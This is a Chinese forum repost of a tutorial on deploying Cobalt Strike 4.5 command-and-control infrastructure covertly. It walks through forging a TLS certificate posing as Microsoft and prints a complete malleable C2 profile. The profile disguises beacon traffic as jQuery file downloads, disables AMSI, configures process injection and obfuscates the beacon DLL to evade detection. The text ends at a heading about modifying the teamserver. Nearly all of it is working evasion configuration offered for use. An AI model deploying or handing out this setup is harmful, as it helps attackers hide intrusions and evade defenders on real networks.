设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 CS部署修改
返回列表 发新帖
查看: 968|回复: 0

CS部署修改

[复制链接]
ivi

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-12-10 12:06:39 | 显示全部楼层 |阅读模式
A_Y Relay学安全 2023-12-09 17:27 发表于陕西

配置隐蔽且OPSEC安全的C2设施

OPSEC 描述了防止对手或潜在对手发现关键操作相关数据的策略。

version : cs4.5

1.自定义CS证书
首先通过 openssl 来生成密钥对,再生成一个证书签名请求 CSR

  1. openssl req -new -newkey rsa:4096 -x509 -sha256 -days 365 -nodes -out public.crt -keyout private.key
  2. openssl req -new -key private.key -out raven.csr
复制代码


依次输入
  1. US
  2. WA
  3. Redmond
  4. Microsoft
  5. Microsoft Corporation
  6. *.microsoft.com
  7. admin@gemail.com

  9. zsx147a
  10. Microsoft
复制代码


把证书和密钥合成为单个的 pkcs12 文件,然后通过 Keytool 导入到 Java 的密钥存储,这样我们就生成了专属的ts.store证书
  1. openssl pkcs12 -inkey private.key -in public.crt -export -out ts.pkcs12
  2. keytool -importkeystore -srckeystore ts.pkcs12 -srcstoretype pkcs12 -destkeystore ts.store
复制代码


查看证书
  1. keytool -list -v -keystore ts.store -storepass zsx147a
  2.                   密码
复制代码


2.C2侧写
  1. https://github.com/threatexpress/malleable-c2
  2. https://github.com/rsmudge/Malleable-C2-Profiles

  4. 是两款不错的侧写,JQuery-C2侧写具有更多默认配置且相对注重OPSEC,所以我选择使用JQuery-C2侧写
  5. 注:如果在过程中更换C2侧写,会丢失目前所有Beacon,因为通信模式不一样了
复制代码


cs4.5的c2侧写示例

jQuery_CS_4.5.profile


  2. set sample_name "jQuery CS 4.5 Profile";
  3. set sleeptime "45000";         # 45 Seconds
  4. set jitter    "37";            # % jitter

  6. set data_jitter "100";         

  8. set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (KHTML, like Gecko)";

  10. https-certificate {
  11.     set keystore "ts.store";
  12.     set password "zsx147a";
  13. }

  15. set tcp_port "42585";
  16. set tcp_frame_header "\x80";

  18. set pipename         "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
  19. set pipename_stager  "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
  20. set smb_frame_header "\x80";

  22. dns-beacon {
  23.     # Options moved into "dns-beacon" group in version 4.3
  24.     set dns_idle           "74.125.196.113"; #google.com (change this to match your campaign)
  25.     set dns_max_txt        "252";
  26.     set dns_sleep          "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
  27.     set dns_ttl            "5";
  28.     set maxdns             "255";
  29.     set dns_stager_prepend ".resources.123456.";
  30.     set dns_stager_subhost ".feeds.123456.";

  32.     # DNS subhosts override options, added in version 4.3
  33.     set beacon           "a.bc.";
  34.     set get_A            "b.1a.";
  35.     set get_AAAA         "c.4a.";
  36.     set get_TXT          "d.tx.";
  37.     set put_metadata     "e.md.";
  38.     set put_output       "f.po.";
  39.     set ns_response      "zero";

  41. }

  43. set ssh_banner        "OpenSSH_7.4 Debian (protocol 2.0)";
  44. set ssh_pipename      "wkssvc##";


  47. set host_stage "false"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set

  49. http-stager {  
  50.     set uri_x86 "/jquery-3.3.1.slim.min.js";
  51.     set uri_x64 "/jquery-3.3.2.slim.min.js";

  53.     server {
  54.         header "Server" "NetDNA-cache/2.2";
  55.         header "Cache-Control" "max-age=0, no-cache";
  56.         header "Pragma" "no-cache";
  57.         header "Connection" "keep-alive";
  58.         header "Content-Type" "application/javascript; charset=utf-8";
  59.         output {
  60.             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
  61.             # 2nd Line            
  62.             prepend "!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";
  63.             # 1st Line
  64.             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
  65.             append "".(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
  66.             print;
  67.         }
  68.     }

  70.     client {
  71.         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  72.         header "Accept-Language" "en-US,en;q=0.5";
  73.         #header "Host" "code.jquery.com";
  74.         header "Referer" "http://code.jquery.com/";
  75.         header "Accept-Encoding" "gzip, deflate";
  76.     }
  77. }

  79. post-ex {
  80.     # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes
  81.     set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
  82.     # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
  83.     set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
  84.     # change the permissions and content of our post-ex DLLs
  85.     set obfuscate "true";
  86.     # pass key function pointers from Beacon to its child jobs
  87.     set smartinject "true";
  88.     # disable AMSI in powerpick, execute-assembly, and psinject
  89.     set amsi_disable "true";
  90.     # Modify our post-ex pipe names
  91.     set pipename "Winsock2\\CatalogChangeListener-###-0,";
  92.     set keylogger "GetAsyncKeyState";
  93.     #set threadhint "module!function+0x##"
  94. }


  97. stage {
  98.    
  99.     # CS 4.2 added allocator and MZ header overrides
  100.     set allocator      "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
  101.     #set magic_mz_x86   "MZRE";
  102.     #set magic_mz_x64   "MZAR";
  103.     set magic_pe       "NO";
  104.     set userwx         "false";
  105.     set stomppe        "true";
  106.     set obfuscate      "true";
  107.     set cleanup        "true";
  108.     # CS 3.12 Addition "Obfuscate and Sleep"
  109.     set sleep_mask     "true";
  110.     # CS 4.1  
  111.     set smartinject    "true";


  114.     set checksum       "0";
  115.     set compile_time   "11 Nov 2016 04:08:32";
  116.     set entry_point    "650688";
  117.     set image_size_x86 "4661248";
  118.     set image_size_x64 "4661248";
  119.     set name           "srv.dll";
  120.     set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

  122.     # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
  123.     transform-x86 { # transform the x86 rDLL stage
  124.         prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
  125.         strrep "ReflectiveLoader" "execute"; # Change this text
  126.         strrep "This program cannot be run in DOS mode" ""; # Remove this text
  127.         strrep "beacon.dll" ""; # Remove this text
  128.     }
  129.     transform-x64 { # transform the x64 rDLL stage
  130.         prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
  131.         strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
  132.         strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
  133.     }

  135.     stringw "jQuery"; # Add this string to the DLL
  136. }


  139. process-inject {

  141.     # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection
  142.     set allocator "NtMapViewOfSection";

  144.     # Minimium memory allocation size when injecting content
  145.     set min_alloc "17500";
  146.    
  147.     # Set memory permissions as permissions as initial=RWX, final=RX
  148.     set startrwx "false";
  149.     set userwx   "false";

  151.     # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append.
  152.     transform-x86 {
  153.         prepend "\x90\x90";
  154.         #append "\x90\x90";
  155.     }

  157.     transform-x64 {
  158.         prepend "\x90\x90";
  159.         #append "\x90\x90";
  160.     }
  161.     execute {

  163.         # The order is important! Each step will be attempted (if applicable) until successful
  164.         ## self-injection
  165.         CreateThread "ntdll!RtlUserThreadStart+0x42";
  166.         CreateThread;

  168.         ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s)
  169.         # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process.
  170.         # SetThreadContext;
  171.         NtQueueApcThread-s;
  172.         
  173.         ## Injection into existing processes
  174.         # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products.
  175.         #NtQueueApcThread;
  176.         
  177.         # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries
  178.         # OPSEC - fires Sysmon Event 8
  179.         CreateRemoteThread;
  180.         
  181.         # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries
  182.         # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
  183.         RtlCreateUserThread;
  184.     }
  185. }

  187. http-config {
  188.     set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
  189.     header "Server" "Apache";
  190.     header "Keep-Alive" "timeout=10, max=100";
  191.     header "Connection" "Keep-Alive";
  192.     set trust_x_forwarded_for "true";
  193.     set block_useragents "curl*,lynx*,wget*";
  194. }

  196. http-get {

  198.     set uri "/jquery-3.3.1.min.js";
  199.     set verb "GET";

  201.     client {

  203.         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  204.         #header "Host" "code.jquery.com";
  205.         header "Referer" "http://code.jquery.com/";
  206.         header "Accept-Encoding" "gzip, deflate";

  208.         metadata {
  209.             base64url;
  210.             prepend "__cfduid=";
  211.             header "Cookie";
  212.         }
  213.     }

  215.     server {

  217.         header "Server" "NetDNA-cache/2.2";
  218.         header "Cache-Control" "max-age=0, no-cache";
  219.         header "Pragma" "no-cache";
  220.         header "Connection" "keep-alive";
  221.         header "Content-Type" "application/javascript; charset=utf-8";

  223.         output {   
  224.             mask;
  225.             base64url;
  226.             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
  227.             # 2nd Line            
  228.             prepend "!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";
  229.             # 1st Line
  230.             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
  231.             append "".(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
  232.             print;
  233.         }
  234.     }
  235. }

  237. http-post {

  239.     set uri "/jquery-3.3.2.min.js";
  240.     set verb "POST";

  242.     client {

  244.         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  245.         #header "Host" "code.jquery.com";
  246.         header "Referer" "http://code.jquery.com/";
  247.         header "Accept-Encoding" "gzip, deflate";
  248.       
  249.         id {
  250.             mask;      
  251.             base64url;
  252.             parameter "__cfduid";            
  253.         }
  254.               
  255.         output {
  256.             mask;
  257.             base64url;
  258.             print;
  259.         }
  260.     }

  262.     server {

  264.         header "Server" "NetDNA-cache/2.2";
  265.         header "Cache-Control" "max-age=0, no-cache";
  266.         header "Pragma" "no-cache";
  267.         header "Connection" "keep-alive";
  268.         header "Content-Type" "application/javascript; charset=utf-8";

  270.         output {
  271.             mask;
  272.             base64url;
  273.             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
  274.             # 2nd Line            
  275.             prepend "!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="\r";
  276.             # 1st Line
  277.             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
  278.             append "".(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
  279.             print;
  280.         }
  281.     }
  282. }
复制代码


注意
  1. .host_stage is FALSE. This will break staging over HTTP, HTTPS, and DNS!
复制代码


我们也可以用工具SourcePoint (https://github.com/Tylous/SourcePoint) 生成定制化的 C2 侧写

测试c2侧写

  1. ./c2lint jQuery_CS_4.5.profile
复制代码




3.修改teamserver
